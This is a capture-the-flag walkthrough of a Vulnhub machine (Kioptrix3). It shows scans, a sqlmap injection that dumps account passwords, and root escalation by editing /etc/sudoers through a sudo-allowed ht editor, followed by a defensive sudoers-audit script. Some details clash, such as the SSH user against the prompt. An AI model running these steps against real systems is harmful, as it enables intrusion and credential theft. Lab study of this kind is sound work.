[Vulnhub] KVM3 (privilege escalation via the ht editor)

Vulnhub Report

Information Gathering

System IP: 192.168.8.100

Service Enumeration
Server IP Address    Ports Open
192.168.8.100        TCP 22,80

Scan with Nmap:

$ nmap -p- -sV -sC 192.168.8.100 --min-rate 1000

Result:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 04:35 EDT
Nmap scan report for 192.168.8.100 (192.168.8.100)
Host is up (0.0030s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: Ligoat Security - Got Goat? Security ...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.24 seconds

Directory Enumeration

$ dirsearch -u "http://192.168.8.100/"

Result:

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/maptnh/reports/http_192.168.8.100/__24-05-18_04-38-27.txt

Target: http://192.168.8.100/

[04:38:27] Starting:
[04:38:29] 403 -  331B  - /.ht_wsr.txt
[04:38:29] 403 -  334B  - /.htaccess.bak1
[04:38:29] 403 -  334B  - /.htaccess.orig
[04:38:29] 403 -  336B  - /.htaccess.sample
[04:38:29] 403 -  334B  - /.htaccess.save
[04:38:29] 403 -  332B  - /.htaccess_sc
[04:38:29] 403 -  334B  - /.htaccess_orig
[04:38:29] 403 -  332B  - /.htaccessOLD
[04:38:29] 403 -  333B  - /.htaccessOLD2
[04:38:29] 403 -  335B  - /.htaccess_extra
[04:38:29] 403 -  332B  - /.htaccessBAK
[04:38:29] 403 -  325B  - /.html
[04:38:29] 403 -  324B  - /.htm
[04:38:29] 403 -  334B  - /.htpasswd_test
[04:38:29] 403 -  331B  - /.httr-oauth
[04:38:29] 403 -  330B  - /.htpasswds
[04:38:49] 301 -  353B  - /cache  ->  http://192.168.8.100/cache/
[04:38:52] 301 -  352B  - /core  ->  http://192.168.8.100/core/
[04:38:52] 200 -  688B  - /core/fragments/moduleInfo.phtml
[04:38:53] 403 -  324B  - /data
[04:38:53] 403 -  336B  - /data/adminer.php
[04:38:53] 403 -  336B  - /data/autosuggest
[04:38:53] 403 -  333B  - /data/backups/
[04:38:53] 403 -  349B  - /data/DoctrineORMModule/Proxy/
[04:38:53] 403 -  349B  - /data/DoctrineORMModule/cache/
[04:38:53] 403 -  334B  - /data/sessions/
[04:38:53] 403 -  331B  - /data/files/
[04:38:53] 403 -  325B  - /data/
[04:38:53] 403 -  331B  - /data/cache/
[04:38:53] 403 -  331B  - /data/debug/
[04:38:53] 403 -  330B  - /data/logs/
[04:38:53] 403 -  329B  - /data/tmp/
[04:38:57] 200 -   23KB - /favicon.ico
[04:38:58] 301 -  355B  - /gallery  ->  http://192.168.8.100/gallery/
[04:39:10] 301 -  355B  - /modules  ->  http://192.168.8.100/modules/
[04:39:10] 200 -    2KB - /modules/
[04:39:15] 301 -  358B  - /phpmyadmin  ->  http://192.168.8.100/phpmyadmin/
[04:39:16] 401 -  519B  - /phpmyadmin/scripts/setup.php
[04:39:16] 200 -    8KB - /phpmyadmin/
[04:39:16] 200 -    8KB - /phpmyadmin/index.php
[04:39:21] 403 -  334B  - /server-status/
[04:39:21] 403 -  333B  - /server-status
[04:39:25] 301 -  353B  - /style  ->  http://192.168.8.100/style/
[04:39:30] 200 -   18B  - /update.php

Task Completed

SQL Injection

Visit the target: http://192.168.8.100/gallery/

Use searchsploit to search for historical CVEs affecting Gallarific:

$ searchsploit Gallarific

Result:

--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gallarific - 'search.php?query' Cross-Site Scripting                                                                       | php/webapps/31369.txt
Gallarific - 'user.php' Arbirary Change Admin Information                                                                  | php/webapps/8796.html
Gallarific - Multiple Script Direct Request Authentication Bypass                                                          | php/webapps/31370.txt
Gallarific 1.1 - '/gallery.php' Arbitrary Delete/Edit Category                                                             | php/webapps/9421.txt
GALLARIFIC PHP Photo Gallery Script - 'gallery.php' SQL Injection                                                          | php/webapps/15891.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------

Use: php/webapps/15891.txt

$ cat /usr/share/exploitdb/exploits/php/webapps/15891.txt

Retrieve the databases

$ sqlmap -u "http://192.168.8.100/gallery/gallery.php?id=1" --dbs --batch

$ sqlmap -u "http://192.168.8.100/gallery/gallery.php?id=1" -D gallery --tables --batch

$ sqlmap -u "http://192.168.8.100/gallery/gallery.php?id=1" -D gallery -T dev_accounts --dump --batch

+----+---------------------------------------------+------------+
| id | password                                    | username   |
+----+---------------------------------------------+------------+
| 1  | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   | dreg       |
| 2  | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret |
+----+---------------------------------------------+------------+

SSH

$ ssh dreg@192.168.8.100

3.2.1.5 Local Contents

loneferret@Kioptrix3:~$ cat /home/loneferret/Local.txt

u28dt2i0

Privilege Escalation

loneferret@Kioptrix3:~$ sudo -l

Result:

User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht

Found that the file /usr/local/bin/ht has the SUID bit set.

loneferret@Kioptrix3:~$ ls -la /usr/local/bin/ht

Try running it:
loneferret@Kioptrix3:~$ /usr/local/bin/ht

Result:
Error opening terminal: xterm-256color.

Run export TERM=xterm so that the terminal emulator can correctly handle and display the output of terminal applications.

loneferret@Kioptrix3:~$ export TERM=xterm

loneferret@Kioptrix3:~$ sudo /usr/local/bin/ht

We are now running the ht editor with root privileges to edit files.

loneferret@Kioptrix3:~$ sudo /usr/local/bin/ht /etc/sudoers

Press F3, enter /etc/sudoers, and press Enter.

Press F2 to save the file.

loneferret@Kioptrix3:~$ sudo /bin/bash
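
The escalation above works because sudoers lets an unprivileged user run an interactive editor as root without a password. The following added example (not part of the original write-up) parses `sudo -l` output like the listing above and flags such grants. The `FILE_WRITERS` set and the function names are assumptions made for illustration.

```python
import re

# Constructed sample: the `sudo -l` listing shown in this write-up.
SUDO_L_OUTPUT = """\
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
"""

# Assumption: illustrative, non-exhaustive set of editors that can open and
# save arbitrary files when they run as root.
FILE_WRITERS = {"ht", "vi", "vim", "nano", "emacs", "ed"}

# "(runas) TAG: TAG: command" as printed by `sudo -l`.
ENTRY = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S.*)$")


def parse_entries(text):
    """Return one dict per sudoers entry found in `sudo -l` output."""
    entries = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue  # header lines such as "User ... may run ..."
        cmd = m.group("cmd").strip()
        entries.append({
            "runas": m.group("runas").split(":")[0].strip(),
            "tags": [t.strip() for t in m.group("tags").split(":") if t.strip()],
            "negated": cmd.startswith("!"),
            "path": cmd.lstrip("!").split()[0],
        })
    return entries


def audit(text):
    """Flag grants that let the user run a file-writing program as root."""
    findings = []
    for e in parse_entries(text):
        if e["negated"] or e["runas"] not in ("root", "ALL"):
            continue  # a deny rule for one path does not offset other grants
        name = e["path"].rsplit("/", 1)[-1]
        if name in FILE_WRITERS:
            severity = "high" if "NOPASSWD" in e["tags"] else "medium"
            findings.append((severity, e["path"]))
    return findings


if __name__ == "__main__":
    for severity, path in audit(SUDO_L_OUTPUT):
        print(f"[{severity}] {path}: root-run editor can rewrite files such as /etc/sudoers")
```

Where a user only needs to edit specific files, granting `sudoedit` on those paths avoids running the editor itself as root.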

Proot Contents

root@Kioptrix3:~# cat /root/Proot.txt

d2ua8u2yd
